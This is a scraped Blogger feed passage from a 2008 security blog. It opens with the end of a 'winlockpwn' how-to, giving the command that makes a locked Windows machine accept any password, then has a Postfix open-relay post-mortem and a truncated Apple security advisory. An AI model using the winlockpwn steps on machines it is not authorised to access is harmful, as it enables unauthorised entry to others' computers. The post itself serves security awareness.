Run &lt;span&gt;winlockpwn&lt;/span&gt;&lt;br /&gt;as follows:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;winlockpwn port node target&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;Mine looked like this:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;span&gt;./winlockpwn 0 1 1&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;Once you run &lt;span&gt;winlockpwn&lt;/span&gt;, the Windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are many security issues that arise from &lt;span&gt;winlockpwn&lt;/span&gt;. What is to stop one of the janitorial staff from getting into the CEO's office after hours and immediately getting access to his box, because all he did was lock it before he went home? It just goes to show that once someone gains physical access, it's game over.&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;Danny Howerton&lt;br /&gt;http://metacortexsecurity.com</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/9135027237287778286/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=9135027237287778286' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/9135027237287778286'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/9135027237287778286'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/03/how-to-winlockpwn.html' title='How To: winlockpwn'/><author><name>Danny 
Howerton</name><uri>http://www.blogger.com/profile/03925809716601141733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-1960154503263569748</id><published>2008-03-25T19:54:00.000-07:00</published><updated>2008-03-25T21:26:06.434-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='subnet'/><category scheme='http://www.blogger.com/atom/ns#' term='open relay'/><category scheme='http://www.blogger.com/atom/ns#' term='netmask'/><category scheme='http://www.blogger.com/atom/ns#' term='cidr'/><category scheme='http://www.blogger.com/atom/ns#' term='spam'/><category scheme='http://www.blogger.com/atom/ns#' term='classful'/><category scheme='http://www.blogger.com/atom/ns#' term='postfix'/><title type='text'>FAIL: When software tries to be smrt, and sysadmins trust it.</title><content type='html'>I run servers for a living... lots of servers, for all sorts of people and customers and workloads. Nothing homogeneous or even enterprisey about most of it.&lt;br /&gt;&lt;br /&gt;Probably a year ago, I noticed one of my client's webserver VPS instances was spewing mail like an open relay. Some quick checking indicated this wasn't the case, and it &lt;a href="http://www.mxtoolbox.com/blacklists.aspx"&gt;wasn't listed on any RBLs&lt;/a&gt; either, so I assumed that some random PHP script was easily pwn3d. Since the client didn't care about email at all (sigh, why'd you have me turn it on?!), I just shut down postfix, saw all the SMTP traffic stop and left it to the client to figure out, since they didn't see fit to have me dig deeper into it, nor could I justify doing it in the absence of financing.&lt;br /&gt;&lt;br /&gt;Fast-forward to last week, when said client needed mail turned on. 
I hesitated and explained why I was reluctant to do this. They assured me that everything had been updated and most of the PHP stuff is gone, aside from a bleeding-edge instance of Wordpress. Okay, that's legit.&lt;br /&gt;&lt;br /&gt;I review the config, trash the mail-queue just in case, and fire up postfix.&lt;br /&gt;&lt;br /&gt;Nothing (bad) happens instantly; I make a note to check it in the morning.&lt;br /&gt;&lt;br /&gt;Everything's okay for the rest of the week: 10msg/day, normal email traffic flow for this client.&lt;br /&gt;&lt;br /&gt;Yesterday morning though, I notice 7412msg/hr being queued. Eeep.&lt;br /&gt;&lt;br /&gt;Killing apache seems to have no effect on the flow.&lt;br /&gt;&lt;br /&gt;Reviewing mailq shows it's all spam or backscatter. Sigh.&lt;br /&gt;I fix the backscatter problem (shame on me), postfix reload, and then just to be sure, do 'postconf -n' - and everything looks okay there too.&lt;br /&gt;I continue auditing things running on the machine and don't see anything out of the ordinary, and yet postfix continues happily to queue spam.&lt;br /&gt;More rummaging turns up nothing other than postfix being the problem.&lt;br /&gt;&lt;br /&gt;And then I found it.&lt;br /&gt;&lt;blockquote&gt;&lt;div style="font-family: monospace;"&gt;[root@bukkit ~]# postconf | grep mynet&lt;br /&gt;&lt;a href="http://www.postfix.org/postconf.5.html#mynetworks"&gt;mynetworks&lt;/a&gt; = 66/8&lt;br /&gt;mynetworks_style = subnet&lt;br /&gt;...&lt;br /&gt;[root@bukkit ~]#&lt;/div&gt;&lt;/blockquote&gt;Postfix made a mistake. An ugly one. 
So ugly, it allowed 1/256th of the IPv4 Internet to relay mail via this server, with impunity.&lt;br /&gt;&lt;br /&gt;But it was a minor error, one all sysadmins have made in their careers...&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;br /&gt;It got the subnet mask wrong.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now, I'm not 100% certain of &lt;span style="font-weight: bold;"&gt;why&lt;/span&gt; this happens, but thanks to the &lt;a href="http://en.wikipedia.org/wiki/Subnetwork#IPv4_classes"&gt;default subnet mask for Class-A networks&lt;/a&gt;, of which my allocation is a part, it had a flashback to the 1980s and defaulted to a /8.&lt;br /&gt;&lt;br /&gt;And since this parameter defaults to being derived at start time, it doesn't show up in 'postconf -n', which only shows non-defaulted configuration parameters.&lt;br /&gt;&lt;br /&gt;Lesson: Don't trust your software to auto-configure properly every time, and when you're auditing configurations - check &lt;span style="font-style: italic;"&gt;everything&lt;/span&gt;, not just non-default settings.&lt;br /&gt;&lt;br /&gt;I've checked all the other machines I'm responsible for, and haven't seen this happening, so I'll be updating this postfix to a later version soon, but at least I've hardcoded mynetworks for now.&lt;br /&gt;&lt;br /&gt;With apologies to the unintended victims, and the rest of the Internet, for making &lt;a href="http://spamcop.net/spamgraph.shtml?spamyear"&gt;the spam problem&lt;/a&gt; worse - not better.&lt;br /&gt;&lt;br /&gt;Mea Culpa.</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/1960154503263569748/comments/default' title='Post Comments'/><link rel='replies' type='text/html' 
href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=1960154503263569748' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/1960154503263569748'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/1960154503263569748'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/03/fail-when-software-tries-to-be-smrt-and.html' title='FAIL: When software tries to be smrt, and sysadmins trust it.'/><author><name>Myke</name><uri>http://www.blogger.com/profile/07897475987183720994</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp3.blogger.com/_xPwdE5P_lz8/R-m5YTbrA8I/AAAAAAAAAAM/XGDTY18Z3rw/S220/DSC00012.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-6959353828666982277</id><published>2008-03-18T18:41:00.000-07:00</published><updated>2008-03-18T18:42:37.746-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='Apple'/><title type='text'>Apple posts update 2008-0002</title><content type='html'>Apple just posted &lt;a href="http://docs.info.apple.com/article.html?artnum=307562"&gt;Apple Security Update 2008-0002&lt;/a&gt;.  
Here's the news, updates for both Leopard and Tiger:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Security Update 2008-002&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-weight: bold;"&gt;AFP Client&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0044&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Accessing a maliciously crafted afp:// URL may lead to an application termination or arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: Multiple stack buffer overflow issues exist in AFP Client's handling of afp:// URLs. By enticing a user to connect to a malicious AFP Server, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issues through improved bounds checking.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;AFP Server&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0045&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Cross-realm authentication with AFP Server may be bypassed&lt;br /&gt;&lt;br /&gt;Description: An implementation issue exists in AFP Server's check of Kerberos principal realm names. This may allow unauthorized connections to the server, when cross-realm authentication with AFP Server is used. This update addresses the issue through improved checks of Kerberos principal realm names. This issue does not affect systems running Mac OS X v10.5 or later. 
Credit to Ragnar Sundblad of KTH - Royal Institute of Technology, Stockholm, Sweden for reporting this issue.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Apache&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2005-3352, CVE-2006-3747, CVE-2007-3847, CVE-2007-5000, CVE-2007-6388&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in Apache 1.3.33 and 1.3.39&lt;br /&gt;&lt;br /&gt;Description: Apache is updated to version 1.3.41 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the Apache web site at http://httpd.apache.org. For Mac OS X v10.5, Apache version 1.3.x is only shipped on Server configurations. mod_ssl is also updated from version 2.8.24 to 2.8.31 to match the upgraded Apache; no security fixes are included in the update.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Apache&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-5000, CVE-2007-6203, CVE-2007-6388, CVE-2007-6421, CVE-2008-0005&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in Apache 2.2.6&lt;br /&gt;&lt;br /&gt;Description: Apache is updated to version 2.2.8 to address several vulnerabilities, the most serious of which may lead to cross-site scripting. Further information is available via the Apache web site at http://httpd.apache.org.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;AppKit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0048&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Usage of the NSDocument API may lead to arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: A stack buffer overflow exists in the NSDocument API's handling of file names. 
On most file systems, this issue is not exploitable. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;AppKit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0049&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: A local user may be able to execute arbitrary code with system privileges&lt;br /&gt;&lt;br /&gt;Description: A mach port in NSApplication intended for inter-thread synchronization is unintentionally available for inter-process communication. By sending maliciously crafted messages to privileged applications in the same bootstrap namespace, a local user may cause arbitrary code execution with the privileges of the target application. This update addresses the issue by removing the mach port in question and using another method to synchronize. This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;AppKit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0057&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Visiting a maliciously crafted website may lead to arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: Multiple integer overflow vulnerabilities exist in the parser for a legacy serialization format. By causing a maliciously formatted serialized property list to be parsed, an attacker could trigger a heap-based buffer overflow which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of serialized input. 
This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;AppKit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0997&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Querying a network printer may cause an unexpected application termination or arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: A stack based buffer overflow exists in AppKit's handling of PPD files. By enticing a user to query a network printer, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved handling of PPD files. This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Application Firewall&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0046&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: The German translation of the Application Firewall preference pane was misleading&lt;br /&gt;&lt;br /&gt;Description: The "Set access for specific services and applications" radio button of the Application Firewall preference pane was translated into German as "Zugriff auf bestimmte Dienste und Programme festlegen", which is "Set access to specific services and applications". This might lead a user to believe that the listed services were the only ones that would be permitted to accept incoming connections. This update addresses the issue by changing the German text to semantically match the English text. 
This issue does not affect systems prior to Mac OS X v10.5.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;CFNetwork&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0050&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: A malicious proxy server may spoof secure websites&lt;br /&gt;&lt;br /&gt;Description: A malicious HTTPS proxy server may return arbitrary data to CFNetwork in a 502 Bad Gateway error. A malicious proxy server could use this to spoof secure websites. This update addresses the issue by returning an error on any proxy error, instead of returning the proxy-supplied data. This issue is already addressed in systems running Mac OS X v10.5.2.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ClamAV&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-5759, CVE-2007-6335, CVE-2007-6336, CVE-2007-6337, CVE-2008-0318, CVE-2008-0728&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in ClamAV 0.90.3&lt;br /&gt;&lt;br /&gt;Description: Multiple vulnerabilities exist in ClamAV 0.90.3 provided with Mac OS X Server v10.5 systems, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1. 
Further information is available via the ClamAV website at www.clamav.net&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ClamAV&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2006-6481, CVE-2007-1745, CVE-2007-1997, CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-0897, CVE-2007-0898, CVE-2008-0318, CVE-2008-0728&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in ClamAV 0.88.5&lt;br /&gt;&lt;br /&gt;Description: Multiple vulnerabilities exist in ClamAV 0.88.5 provided with Mac OS X Server v10.4.11, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1. Further information is available via the ClamAV website at www.clamav.net&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;CoreFoundation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0051&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: A local user may be able to execute arbitrary code with system privileges&lt;br /&gt;&lt;br /&gt;Description: An integer overflow exists in CoreFoundation's handling of time zone data. This may allow a local user to cause arbitrary code execution with system privileges. This update addresses the issue through improved bounds checking on time zone data files. This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;CoreServices&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0052&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Visiting a website could cause files to be opened in AppleWorks&lt;br /&gt;&lt;br /&gt;Description: Files with names ending in ".ief" can be automatically opened in AppleWorks if Safari's "Open 'Safe' files" preference is enabled. 
This is not the intended behavior and could lead to security policy violations. This update addresses the issue by removing ".ief" from the list of safe file types. This issue only affects systems prior to Mac OS X v10.5 with AppleWorks installed.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;CUPS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0596&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: A remote attacker may be able to cause an unexpected application termination if printer sharing is enabled&lt;br /&gt;&lt;br /&gt;Description: A memory leak exists in CUPS. By sending a large number of requests to add and remove shared printers, an attacker may be able to cause a denial of service. This issue can not result in arbitrary code execution. This update addresses the issue through improved memory management. This issue does not affect systems prior to Mac OS X v10.5.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;CUPS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0047&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: A remote attacker may be able to cause an unexpected application termination or arbitrary code execution if printer sharing is enabled&lt;br /&gt;&lt;br /&gt;Description: A heap buffer overflow exists in the CUPS interface's processing of search expressions. If printer sharing is enabled, a remote attacker may be able to cause an unexpected application termination or arbitrary code execution with system privileges. If printer sharing is not enabled, a local user may be able to gain system privileges. This update addresses the issue by performing additional bounds checking. This issue does not affect systems prior to Mac OS X v10.5. 
Credit to regenrecht working with the VeriSign iDefense VCP for reporting this issue.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;CUPS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0053, CVE-2008-0882&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in CUPS may lead to an unexpected application termination or arbitrary code execution with system privileges&lt;br /&gt;&lt;br /&gt;Description: Multiple input validation issues exist in CUPS, the most serious of which may lead to arbitrary code execution with system privileges. This update addresses the issues by updating to CUPS 1.3.6. These issues do not affect systems prior to Mac OS X v10.5.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;curl&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2005-4077&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Running curl with a maliciously crafted URL may lead to an unexpected application termination or arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: A one byte buffer overflow exists in curl 7.13.1. By enticing a user to run curl with a maliciously crafted URL, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue by updating curl to version 7.16.3. Crash Reporter was updated to match the curl changes. 
This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Emacs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-6109&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Format string vulnerability in Emacs Lisp may lead to an unexpected application termination or possibly arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: A stack buffer overflow exists in Emacs' format function. By exploiting vulnerable Emacs Lisp which allows an attacker to provide a format string containing a large precision value, an attacker may cause an unexpected application termination or possibly arbitrary code execution. Further information on the patch applied is available via the Savannah Emacs website &lt;a href="http://cvs.savannah.gnu.org/viewvc/emacs/emacs/src/editfns.c?r1=1.439.2.3&amp;amp;r2=1.439.2.9&amp;amp;view=patch"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Emacs&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-5795&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Safe mode checks in Emacs may be bypassed&lt;br /&gt;&lt;br /&gt;Description: A logic error in Emacs' hack-local-variable function allows any local variable to be set, even if `enable-local-variables' is set to :safe. By enticing a user to load a file containing a maliciously crafted local variables declaration, a local user may cause an unauthorized modification of Emacs Lisp variables leading to arbitrary code execution. This issue has been fixed through improved :safe mode checks. 
The patch applied is available via the Savannah Emacs website &lt;a href="http://cvs.savannah.gnu.org/viewvc/emacs/lisp/files.el?r1=1.937&amp;amp;r2=1.938&amp;amp;sortby=date&amp;amp;root=emacs&amp;amp;view=patch"&gt;here&lt;/a&gt;.&lt;br /&gt;This issue does not affect systems prior to Mac OS X v10.5.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;file&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-2799&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Running the file command on a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: An integer overflow vulnerability exists in the file command line tool, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Colin Percival of the FreeBSD security team for reporting this issue.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Foundation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0054&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Usage of the NSSelectorFromString API may result in an unexpected method being called&lt;br /&gt;&lt;br /&gt;Description: An input validation issue exists in the NSSelectorFromString API. Passing it a malformed selector name may result in the return of an unexpected selector, which could lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation on the selector name. 
This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Foundation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0055&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: A local user can interfere in other users' file operations and may be able to obtain elevated privileges&lt;br /&gt;&lt;br /&gt;Description: When performing a recursive file copying operation, NSFileManager creates directories as world-writable, and only later restricts the permissions. This creates a race condition during which a local user can manipulate the directory and interfere in subsequent operations. This may lead to a privilege escalation to that of the application using t he API. This update addresses the issue by creating directories with restrictive permissions. This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Foundation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0056&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Programs using the NSFileManager API could be manipulated to execute arbitrary code&lt;br /&gt;&lt;br /&gt;Description: A long pathname with an unexpected structure can expose a stack buffer overflow vulnerability in NSFileManager. Presenting a specially crafted path to a program using NSFileManager could lead to the execution of arbitrary code. This update addresses the issue by ensuring a properly sized destination buffer. 
This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Foundation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0058&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Visiting a maliciously crafted website may lead to a denial of service or arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: A thread race condition exists in NSURLConnection's cache management, which can cause a deallocated object to receive messages. Triggering this issue may lead to a denial of service, or arbitrary code execution with the privileges of Safari or another program using NSURLConnection. This update addresses the issue by removing an unsynchronized caching operation. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Daniel Jalkut of Red Sweater Software for reporting this issue.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Foundation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0059&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Processing an XML document may lead to an unexpected application termination or arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: A race condition exists in NSXML. By enticing a user to process an XML file in an application which uses NSXML, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improvements to the error handling logic of NSXML. 
This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Help Viewer&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0060&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Accessing a maliciously crafted help: URL may lead to arbitrary Applescript execution&lt;br /&gt;&lt;br /&gt;Description: A malicious help:topic_list URL may insert arbitrary HTML or JavaScript into the generated topic list page, which may redirect to a Help Viewer help:runscript link that runs Applescript. This update addresses the issue by performing HTML escaping on the URL data used in help topic lists before building the generated page. Credit to Brian Mastenbrook for reporting this issue.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Image Raw&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0987&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Viewing a maliciously crafted image may lead to an unexpected application termination or arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: A stack based buffer overflow exists in the handling of Adobe Digital Negative (DNG) image files. By enticing a user to open a maliciously crafted image file, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved validation of DNG image files. This issue does not affect systems prior to Mac OS X v10.5. 
Credit to Clint Ruoho of Laconic Security for reporting this issue.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Kerberos&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-5901, CVE-2007-5971, CVE-2008-0062, CVE-2008-0063&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in MIT Kerberos 5 may lead to an unexpected application termination or arbitrary code execution with system privileges&lt;br /&gt;&lt;br /&gt;Description: Multiple memory corruption issues exist in MIT Kerberos 5, which may lead to an unexpected application termination or arbitrary code execution with system privileges. Further information on the issues and the patches applied is available via the MIT Kerberos website at http://web.mit.edu/Kerberos/. CVE-2008-0062 and CVE-2008-0063 do not affect systems running Mac OS X v10.5 or later. CVE-2007-5901 does not affect systems prior to Mac OS X v10.4.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;libc&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0988&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Applications that use the strnstr API could be vulnerable to a denial of service&lt;br /&gt;&lt;br /&gt;Description: An off-by-one issue exists in Libsystem's strnstr(3) implementation. Applications that use the strnstr API can read one byte beyond the limit specified by the user, which may lead to an unexpected application termination. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later. 
